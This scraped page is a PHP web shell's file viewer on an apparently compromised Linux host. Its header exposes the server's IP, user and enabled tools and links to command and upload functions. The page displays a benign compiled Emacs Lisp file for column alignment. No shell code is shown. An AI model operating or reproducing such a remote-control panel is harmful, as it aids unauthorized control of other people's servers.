Server IP : 111.118.215.189 / Your IP : 18.119.172.58 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/emacs/24.3/lisp/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
;ELC ;;; Compiled by mockbuild@buildfarm06-new.corp.cloudlinux.com on Fri Oct 11 10:06:13 2024 ;;; from file /builddir/build/BUILD/emacs-24.3/lisp/delim-col.el ;;; in Emacs version 24.3.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301\302\303\304\305\306\307\310\311& \210\312\313\314\315\316\317\310\301&\210\312\320\321\322\316\323\310\301&\210\312\324\314\325\316\326\310\301&\210\312\327\314\330\316\331\310\301&\210\312\332\314\333\316\334\310\301&\210\312\335\336\337\316\340\310\301&\210\312\341\342\343\316\344\310\301&\210\312\345\342\346\316\347\310\301&\210\312\350\351\352\316\353\310\301&\210\312\354\355\356\316\357\310\301&\207" [custom-declare-group columns nil "Prettify columns." :link (emacs-library-link :tag "Source Lisp File" "delim-col.el") :prefix "delimit-columns-" :group wp custom-declare-variable delimit-columns-str-before "" "Specify a string to be inserted before all columns." :type (string :tag "Before All Columns") delimit-columns-str-separator ", " "Specify a string to be inserted between each column." (string :tag "Between Each Column") delimit-columns-str-after "Specify a string to be inserted after all columns." (string :tag "After All Columns") delimit-columns-before "Specify a string to be inserted before each column." (string :tag "Before Each Column") delimit-columns-after "Specify a string to be inserted after each column." (string :tag "After Each Column") delimit-columns-separator " " "Specify a regexp which separates each column." (regexp :tag "Column Separator") delimit-columns-format t "Specify how to format columns.\n\nFor examples below, consider:\n\n + columns `ccc' and `dddd',\n + the maximum column length for each column is 6,\n + and the following settings:\n (setq delimit-columns-before \"<\")\n (setq delimit-columns-after \">\")\n (setq delimit-columns-separator \":\")\n\nValid values are:\n\n nil no formatting. That is, `delimit-columns-after' is followed by\n `delimit-columns-separator'.\n For example, the result is: \"<ccc>:<dddd>:\"\n\n t align columns. That is, `delimit-columns-after' is followed by\n `delimit-columns-separator' and then followed by spaces.\n For example, the result is: \"<ccc>: <dddd>: \"\n\n 'separator align separators. That is, `delimit-columns-after' is followed\n by spaces and then followed by `delimit-columns-separator'.\n For example, the result is: \"<ccc> :<dddd> :\"\n\n 'padding format column by filling with spaces before\n `delimit-columns-after'. That is, spaces are followed by\n `delimit-columns-after' and then followed by\n `delimit-columns-separator'.\n For example, the result is: \"<ccc >:<dddd >:\"\n\nAny other value is treated as t." (choice :menu-tag "Column Formatting" :tag "Column Formatting" (const :tag "No Formatting" nil) (const :tag "Column Alignment" t) (const :tag "Separator Alignment" separator) (const :tag "Column Padding" padding)) delimit-columns-extra "Non-nil means that lines will have the same number of columns.\n\nThis has effect only when there are lines with different number of columns." (boolean :tag "Lines With Same Number Of Column") delimit-columns-start 0 "Specify column number to start prettifying.\n\nSee also `delimit-columns-end' for documentation.\n\nThe following relation must hold:\n 0 <= delimit-columns-start <= delimit-columns-end\n\nThe column number start from 0 and it's relative to the beginning of selected\nregion. So if you selected a text region, the first column (column 0) is\nlocated at beginning of line. If you selected a text rectangle, the first\ncolumn (column 0) is located at left corner." (integer :tag "Column Start") delimit-columns-end 1000000 "Specify column number to end prettifying.\n\nSee also `delimit-columns-start' for documentation.\n\nThe following relation must hold:\n 0 <= delimit-columns-start <= delimit-columns-end\n\nThe column number start from 0 and it's relative to the beginning of selected\nregion. So if you selected a text region, the first column (column 0) is\nlocated at beginning of line. If you selected a text rectangle, the first\ncolumn (column 0) is located at left corner." (integer :tag "Column End")] 10) (defvar delimit-columns-max nil) (defvar delimit-columns-limit nil) #@35 Customization of `columns' group. (defalias 'delimit-columns-customize #[nil "\300\301!\207" [customize-group columns] 2 (#$ . 4614) nil]) (defalias 'delimit-columns-str '(macro . #[(str) "\301\302D\303BBB\207" [str if stringp ("")] 4])) #@81 Prettify all columns in a text region. START and END delimits the text region. (defalias 'delimit-columns-region #[(start end) ";\203 \202\n \306 ;\203 \202 \306\n;\203 \n\202 \306;\203'